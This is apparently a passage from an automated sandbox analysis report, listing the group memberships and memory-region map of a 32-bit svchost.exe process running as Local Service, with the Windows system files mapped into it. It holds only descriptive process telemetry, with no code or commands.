"NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b7ac" [0xc000000f], "LOCAL" [0x7] Region: id = 1974 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1975 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 1976 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1977 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1978 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1979 start_va = 0xd0000 end_va = 0x136fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1980 start_va = 0x140000 end_va = 0x140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1981 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1982 start_va = 0x160000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 1983 start_va = 0x260000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 1984 start_va = 0x360000 end_va = 0x36cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 1985 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 1986 start_va = 0x380000 end_va = 0x507fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 1987 start_va = 0x510000 end_va = 0x690fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1988 start_va = 0x6a0000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 1989 start_va = 0x760000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 1990 start_va = 0x7a0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1991 start_va = 0x7c0000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 1992 start_va = 0x840000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 1993 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1994 start_va = 0x880000 end_va = 0x880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 1995 start_va = 0x890000 end_va = 0x891fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 1996 start_va = 0x8a0000 end_va = 0x8a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 1997 start_va = 0x8b0000 end_va = 0x8b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 1998 start_va = 0x900000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 1999 start_va = 0xa80000 end_va = 0xd4efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2000 start_va = 0xd50000 end_va = 0xdb1fff monitored = 0 entry_point = 0xd608d8 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 2001 start_va = 0xdc0000 end_va = 0xdc1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 2002 start_va = 0xdd0000 end_va = 0xdd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dd0000" filename = "" Region: id = 2003 start_va = 0xde0000 end_va = 0xde0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000de0000" filename = "" Region: id = 2004 start_va = 0xdf0000 end_va = 0xdf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 2005 start_va = 0xe00000 end_va = 0xe00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 2006 start_va = 0xe10000 end_va = 0xe10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e10000" filename = "" Region: id = 2007 start_va = 0xe20000 end_va = 0xe27fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 2008 start_va = 0xe30000 end_va = 0xf2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 2009 start_va = 0x1030000 end_va = 0x10affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 2010 start_va = 0x10b0000 end_va = 0x112ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 2011 start_va = 0x1150000 end_va = 0x11cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 2012 start_va = 0x1220000 end_va = 0x129ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001220000" filename = "" Region: id = 2013 start_va = 0x1330000 end_va = 0x13affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001330000" filename = "" Region: id = 2014 start_va = 0x13e0000 end_va = 0x145ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013e0000" filename = "" Region: id = 2015 start_va = 0x14d0000 end_va = 0x154ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014d0000" filename = "" Region: id = 2016 start_va = 0x1550000 end_va = 0x174ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001550000" filename = "" Region: id = 2017 start_va = 0x17b0000 end_va = 0x182ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017b0000" filename = "" Region: id = 2018 start_va = 0x1870000 end_va = 0x18effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001870000" filename = "" Region: id = 2019 start_va = 0x18f0000 end_va = 0x196ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000018f0000" filename = "" Region: id = 2020 start_va = 0x1990000 end_va = 0x1a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001990000" filename = "" Region: id = 2021 start_va = 0x1a40000 end_va = 0x1abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a40000" filename = "" Region: id = 2022 start_va = 0x1be0000 end_va = 0x1c5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001be0000" filename = "" Region: id = 2023 start_va = 0x1c70000 end_va = 0x1ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 2024 start_va = 0x1cf0000 end_va = 0x20f2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cf0000" filename = "" Region: id = 2025 start_va = 0x2100000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 2026 start_va = 0x2520000 end_va = 0x259ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002520000" filename = "" Region: id = 2027 start_va = 0x25b0000 end_va = 0x262ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 2028 start_va = 0x26a0000 end_va = 0x271ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 2029 start_va = 0x2880000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 2030 start_va = 0x2900000 end_va = 0x297ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2031 start_va = 0x2980000 end_va = 0x317ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002980000" filename = "" Region: id = 2032 start_va = 0x3210000 end_va = 0x328ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003210000" filename = "" Region: id = 2033 start_va = 0x3290000 end_va = 0x338ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003290000" filename = "" Region: id = 2034 start_va = 0x33a0000 end_va = 0x341ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033a0000" filename = "" Region: id = 2035 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2036 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2037 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2038 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2039 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2040 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2041 start_va = 0xff030000 end_va = 0xff082fff monitored = 0 entry_point = 0xff043310 region_type = mapped_file name = "services.exe" filename = "\\Windows\\System32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe") Region: id = 2042 start_va = 0xff300000 end_va = 0xff30afff monitored = 0 entry_point = 0xff30246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 2043 start_va = 0xff430000 end_va = 0xff491fff monitored = 0 entry_point = 0xff4408d8 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 2044 start_va = 0x7fef0d30000 end_va = 0x7fef0dddfff monitored = 0 entry_point = 0x7fef0d34104 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 2045 start_va = 0x7fef0eb0000 end_va = 0x7fef0fd4fff monitored = 0 entry_point = 0x7fef0f01570 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 2046 start_va = 0x7fef1dc0000 end_va = 0x7fef1ddbfff monitored = 0 entry_point = 0x7fef1dc1060 region_type = mapped_file name = "wscsvc.dll" filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll") Region: id = 2047 start_va = 0x7fef50a0000 end_va = 0x7fef50b2fff monitored = 0 entry_point = 0x7fef50a1d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 2048 start_va = 0x7fef5310000 end_va = 0x7fef531dfff monitored = 0 entry_point = 0x7fef5315500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2049 start_va = 0x7fef5320000 end_va = 0x7fef5346fff monitored = 0 entry_point = 0x7fef53211a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 2050 start_va = 0x7fef5350000 end_va = 0x7fef5422fff monitored = 0 entry_point = 0x7fef53c8b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 2051 start_va = 0x7fef56c0000 end_va = 0x7fef5736fff monitored = 0 entry_point = 0x7fef56fe7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 2052 start_va = 0x7fef7f60000 end_va = 0x7fef7f7afff monitored = 0 entry_point = 0x7fef7f61198 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 2053 start_va = 0x7fef85d0000 end_va = 0x7fef861efff monitored = 0 entry_point = 0x7fef85d2760 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 2054 start_va = 0x7fef9100000 end_va = 0x7fef9117fff monitored = 0 entry_point = 0x7fef9101bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 2055 start_va = 0x7fef9120000 end_va = 0x7fef9130fff monitored = 0 entry_point = 0x7fef91216ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 2056 start_va = 0x7fef91e0000 end_va = 0x7fef921afff monitored = 0 entry_point = 0x7fef91e4520 region_type = mapped_file name = "dhcpcore6.dll" filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll") Region: id = 2057 start_va = 0x7fef9220000 end_va = 0x7fef9270fff monitored = 0 entry_point = 0x7fef922f6c0 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 2058 start_va = 0x7fef9290000 end_va = 0x7fef9297fff monitored = 0 entry_point = 0x7fef929284c region_type = mapped_file name = "nrpsrv.dll" filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll") Region: id = 2059 start_va = 0x7fef92a0000 end_va = 0x7fef92a9fff monitored = 0 entry_point = 0x7fef92a1adc region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 2060 start_va = 0x7fefb230000 end_va = 0x7fefb23afff monitored = 0 entry_point = 0x7fefb231198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2061 start_va = 0x7fefb240000 end_va = 0x7fefb266fff monitored = 0 entry_point = 0x7fefb2498bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2062 start_va = 0x7fefb6e0000 end_va = 0x7fefb6e8fff monitored = 0 entry_point = 0x7fefb6e1010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 2063 start_va = 0x7fefb6f0000 end_va = 0x7fefb71bfff monitored = 0 entry_point = 0x7fefb6f15c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2064 start_va = 0x7fefb720000 end_va = 0x7fefb7cbfff monitored = 0 entry_point = 0x7fefb736acc region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 2065 start_va = 0x7fefb940000 end_va = 0x7fefb954fff monitored = 0 entry_point = 0x7fefb941050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2066 start_va = 0x7fefb960000 end_va = 0x7fefb96bfff monitored = 0 entry_point = 0x7fefb9618a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2067 start_va = 0x7fefbc60000 end_va = 0x7fefbcaafff monitored = 0 entry_point = 0x7fefbc6efcc region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 2068 start_va = 0x7fefc0d0000 end_va = 0x7fefc1fbfff monitored = 0 entry_point = 0x7fefc0d94bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2069 start_va = 0x7fefc740000 end_va = 0x7fefc76cfff monitored = 0 entry_point = 0x7fefc741010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2070 start_va = 0x7fefc770000 end_va = 0x7fefc905fff monitored = 0 entry_point = 0x7fefc7778e4 region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll") Region: id = 2071 start_va = 0x7fefc910000 end_va = 0x7fefc91bfff monitored = 0 entry_point = 0x7fefc911064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2072 start_va = 0x7fefc920000 end_va = 0x7fefc9dafff monitored = 0 entry_point = 0x7fefc926de0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 2073 start_va = 0x7fefc9e0000 end_va = 0x7fefc9e6fff monitored = 0 entry_point = 0x7fefc9e14b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 2074 start_va = 0x7fefcad0000 end_va = 0x7fefcaeafff monitored = 0 entry_point = 0x7fefcad2068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 2075 start_va = 0x7fefcaf0000 end_va = 0x7fefcb0dfff monitored = 0 entry_point = 0x7fefcaf13b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2076 start_va = 0x7fefcc40000 end_va = 0x7fefcc49fff monitored = 0 entry_point = 0x7fefcc43cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 2077 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2078 start_va = 0x7fefce60000 end_va = 0x7fefcebafff monitored = 0 entry_point = 0x7fefce66940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 2079 start_va = 0x7fefcfd0000 end_va = 0x7fefcfd6fff monitored = 0 entry_point = 0x7fefcfd142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 2080 start_va = 0x7fefcfe0000 end_va = 0x7fefd034fff monitored = 0 entry_point = 0x7fefcfe1054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 2081 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2082 start_va = 0x7fefd190000 end_va = 0x7fefd1b1fff monitored = 0 entry_point = 0x7fefd195d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2083 start_va = 0x7fefd250000 end_va = 0x7fefd2bcfff monitored = 0 entry_point = 0x7fefd251010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 2084 start_va = 0x7fefd5e0000 end_va = 0x7fefd5eafff monitored = 0 entry_point = 0x7fefd5e1030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2085 start_va = 0x7fefd610000 end_va = 0x7fefd634fff monitored = 0 entry_point = 0x7fefd619658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2086 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2087 start_va = 0x7fefd6f0000 end_va = 0x7fefd72cfff monitored = 0 entry_point = 0x7fefd6f18f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2088 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2089 start_va = 0x7fefd750000 end_va = 0x7fefd75efff monitored = 0 entry_point = 0x7fefd7519b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2090 start_va = 0x7fefd7f0000 end_va = 0x7fefd7fefff monitored = 0 entry_point = 0x7fefd7f1020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2091 start_va = 0x7fefd800000 end_va = 0x7fefd96cfff monitored = 0 entry_point = 0x7fefd8010b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2092 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2093 start_va = 0x7fefd9e0000 end_va = 0x7fefda1afff monitored = 0 entry_point = 0x7fefd9e1324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 2094 start_va = 0x7fefda20000 end_va = 0x7fefda55fff monitored = 0 entry_point = 0x7fefda21474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2095 start_va = 0x7fefda60000 end_va = 0x7fefda79fff monitored = 0 entry_point = 0x7fefda61558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2096 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2097 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2098 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2099 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2100 start_va = 0x7fefef30000 end_va = 0x7fefefa0fff monitored = 0 entry_point = 0x7fefef41e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2101 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2102 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2103 start_va = 0x7feff130000 end_va = 0x7feff137fff monitored = 0 entry_point = 0x7feff131504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2104 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2105 start_va = 0x7feff180000 end_va = 0x7feff1d1fff monitored = 0 entry_point = 0x7feff1810d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 2106 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2107 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2108 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2109 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2110 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2111 start_va = 0x7feff680000 end_va = 